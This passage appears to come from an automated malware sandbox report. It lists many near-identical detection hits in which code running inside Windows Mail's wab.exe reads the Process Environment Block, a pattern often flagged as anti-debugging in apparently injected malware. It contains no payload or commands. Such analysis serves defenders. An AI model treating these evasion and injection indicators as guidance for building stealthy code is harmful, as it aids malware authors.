        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov ecx, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov ecx, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D0C0 mov eax, dword ptr fs:[00000030h]12_2_2028D0C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D0C0 mov eax, dword ptr fs:[00000030h]12_2_2028D0C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202920DE mov eax, dword ptr fs:[00000030h]12_2_202920DE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E50D9 mov eax, dword ptr fs:[00000030h]12_2_202E50D9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202390DB mov eax, dword ptr fs:[00000030h]12_2_202390DB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20240124 mov eax, dword ptr fs:[00000030h]12_2_20240124
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20211131 mov eax, dword ptr fs:[00000030h]12_2_20211131
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20211131 mov eax, dword ptr fs:[00000030h]12_2_20211131
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B136 mov eax, dword ptr fs:[00000030h]12_2_2020B136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B136 mov eax, dword ptr fs:[00000030h]12_2_2020B136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B136 mov eax, dword ptr fs:[00000030h]12_2_2020B136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B136 mov eax, dword ptr fs:[00000030h]12_2_2020B136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BA118 mov ecx, dword ptr fs:[00000030h]12_2_202BA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BA118 mov eax, dword ptr fs:[00000030h]12_2_202BA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BA118 mov eax, dword ptr fs:[00000030h]12_2_202BA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BA118 mov eax, dword ptr fs:[00000030h]12_2_202BA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D0115 mov eax, dword ptr fs:[00000030h]12_2_202D0115
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A9179 mov eax, dword ptr fs:[00000030h]12_2_202A9179
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209148 mov eax, dword ptr fs:[00000030h]12_2_20209148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209148 mov eax, dword ptr fs:[00000030h]12_2_20209148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209148 mov eax, dword ptr fs:[00000030h]12_2_20209148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209148 mov eax, dword ptr fs:[00000030h]12_2_20209148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h]12_2_202A4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h]12_2_202A4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A4144 mov ecx, dword ptr fs:[00000030h]12_2_202A4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h]12_2_202A4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h]12_2_202A4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20217152 mov eax, dword ptr fs:[00000030h]12_2_20217152
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20216154 mov eax, dword ptr fs:[00000030h]12_2_20216154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20216154 mov eax, dword ptr fs:[00000030h]12_2_20216154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020C156 mov eax, dword ptr fs:[00000030h]12_2_2020C156
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5152 mov eax, dword ptr fs:[00000030h]12_2_202E5152
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h]12_2_202C11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h]12_2_202C11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h]12_2_202C11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h]12_2_202C11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022B1B0 mov eax, dword ptr fs:[00000030h]12_2_2022B1B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20250185 mov eax, dword ptr fs:[00000030h]12_2_20250185
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CC188 mov eax, dword ptr fs:[00000030h]12_2_202CC188
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CC188 mov eax, dword ptr fs:[00000030h]12_2_202CC188
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029019F mov eax, dword ptr fs:[00000030h]12_2_2029019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029019F mov eax, dword ptr fs:[00000030h]12_2_2029019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029019F mov eax, dword ptr fs:[00000030h]12_2_2029019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029019F mov eax, dword ptr fs:[00000030h]12_2_2029019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20267190 mov eax, dword ptr fs:[00000030h]12_2_20267190
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h]12_2_2020A197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h]12_2_2020A197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h]12_2_2020A197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E61E5 mov eax, dword ptr fs:[00000030h]12_2_202E61E5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202151ED mov eax, dword ptr fs:[00000030h]12_2_202151ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202401F8 mov eax, dword ptr fs:[00000030h]12_2_202401F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E51CB mov eax, dword ptr fs:[00000030h]12_2_202E51CB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D61C3 mov eax, dword ptr fs:[00000030h]12_2_202D61C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D61C3 mov eax, dword ptr fs:[00000030h]12_2_202D61C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024D1D0 mov eax, dword ptr fs:[00000030h]12_2_2024D1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024D1D0 mov ecx, dword ptr fs:[00000030h]12_2_2024D1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5227 mov eax, dword ptr fs:[00000030h]12_2_202E5227
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020823B mov eax, dword ptr fs:[00000030h]12_2_2020823B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20247208 mov eax, dword ptr fs:[00000030h]12_2_20247208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20247208 mov eax, dword ptr fs:[00000030h]12_2_20247208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20214260 mov eax, dword ptr fs:[00000030h]12_2_20214260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20214260 mov eax, dword ptr fs:[00000030h]12_2_20214260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20214260 mov eax, dword ptr fs:[00000030h]12_2_20214260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DD26B mov eax, dword ptr fs:[00000030h]12_2_202DD26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DD26B mov eax, dword ptr fs:[00000030h]12_2_202DD26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020826B mov eax, dword ptr fs:[00000030h]12_2_2020826B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20251270 mov eax, dword ptr fs:[00000030h]12_2_20251270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20251270 mov eax, dword ptr fs:[00000030h]12_2_20251270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20239274 mov eax, dword ptr fs:[00000030h]12_2_20239274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209240 mov eax, dword ptr fs:[00000030h]12_2_20209240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209240 mov eax, dword ptr fs:[00000030h]12_2_20209240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024724D mov eax, dword ptr fs:[00000030h]12_2_2024724D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A250 mov eax, dword ptr fs:[00000030h]12_2_2020A250
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20216259 mov eax, dword ptr fs:[00000030h]12_2_20216259
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CB256 mov eax, dword ptr fs:[00000030h]12_2_202CB256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CB256 mov eax, dword ptr fs:[00000030h]12_2_202CB256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202202A0 mov eax, dword ptr fs:[00000030h]12_2_202202A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202202A0 mov eax, dword ptr fs:[00000030h]12_2_202202A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h]12_2_202252A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h]12_2_202252A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h]12_2_202252A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h]12_2_202252A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A72A0 mov eax, dword ptr fs:[00000030h]12_2_202A72A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A72A0 mov eax, dword ptr fs:[00000030h]12_2_202A72A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov ecx, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h]12_2_202D92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h]12_2_202D92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h]12_2_202D92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h]12_2_202D92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202992BC mov eax, dword ptr fs:[00000030h]12_2_202992BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202992BC mov eax, dword ptr fs:[00000030h]12_2_202992BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202992BC mov ecx, dword ptr fs:[00000030h]12_2_202992BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202992BC mov ecx, dword ptr fs:[00000030h]12_2_202992BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E284 mov eax, dword ptr fs:[00000030h]12_2_2024E284
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E284 mov eax, dword ptr fs:[00000030h]12_2_2024E284
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20290283 mov eax, dword ptr fs:[00000030h]12_2_20290283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20290283 mov eax, dword ptr fs:[00000030h]12_2_20290283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20290283 mov eax, dword ptr fs:[00000030h]12_2_20290283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5283 mov eax, dword ptr fs:[00000030h]12_2_202E5283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024329E mov eax, dword ptr fs:[00000030h]12_2_2024329E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024329E mov eax, dword ptr fs:[00000030h]12_2_2024329E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h]12_2_202202E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h]12_2_202202E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h]12_2_202202E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E52E2 mov eax, dword ptr fs:[00000030h]12_2_202E52E2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CF2F8 mov eax, dword ptr fs:[00000030h]12_2_202CF2F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202092FF mov eax, dword ptr fs:[00000030h]12_2_202092FF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h]12_2_2021A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h]12_2_2021A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h]12_2_2021A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h]12_2_2021A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h]12_2_2021A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202192C5 mov eax, dword ptr fs:[00000030h]12_2_202192C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202192C5 mov eax, dword ptr fs:[00000030h]12_2_202192C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F2D0 mov eax, dword ptr fs:[00000030h]12_2_2023F2D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F2D0 mov eax, dword ptr fs:[00000030h]12_2_2023F2D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h]12_2_2020B2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h]12_2_2020B2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h]12_2_2020B2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D132D mov eax, dword ptr fs:[00000030h]12_2_202D132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D132D mov eax, dword ptr fs:[00000030h]12_2_202D132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F32A mov eax, dword ptr fs:[00000030h]12_2_2023F32A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20207330 mov eax, dword ptr fs:[00000030h]12_2_20207330
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029930B mov eax, dword ptr fs:[00000030h]12_2_2029930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029930B mov eax, dword ptr fs:[00000030h]12_2_2029930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029930B mov eax, dword ptr fs:[00000030h]12_2_2029930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h]12_2_2024A30B
